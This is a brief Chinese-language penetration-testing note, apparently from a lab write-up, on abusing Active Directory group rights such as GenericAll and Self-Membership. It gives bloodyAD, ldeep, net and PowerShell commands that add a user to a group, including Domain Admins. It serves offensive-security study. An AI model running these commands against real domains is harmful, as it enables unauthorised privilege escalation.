1.AddMember

AddMember | The Hacker Recipes

1. 介绍

1.1. 条件

当控制对目标组具有 GenericAll 、 GenericWrite 、 Self 、 AllExtendedRights 或 Self-Membership 的对象时,可以进行利用
Pasted image 20250627125443

alfred 可以把自己添加到用户组 Infrastructure

1.2. 利用

1.2.1. bloodyAD

#添加用户
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add groupMember "$TargetGroup" "$TargetUser"

#查询指定用户的membership,可以用于检测是否添加成功
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get membership "$TargetUser"

Pasted image 20250628152426

1.2.2. ldeep

ldeep ldap -d "$DOMAIN" -s "$DC_IP" -u "$USER" -p "$PASSWORD" add_to_group "$TargetUser" "$TargetGroup"
#"$TargetUser" "$TargetGroup" 需要使用DN的格式

Pasted image 20250628153458

1.2.3. windows cmd&powershell

# Command line
net group 'Domain Admins' 'user' /add /domain

# Powershell: Active Directory module
Add-ADGroupMember -Identity 'Domain Admins' -Members 'user'

# Powershell: PowerSploit module
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'user'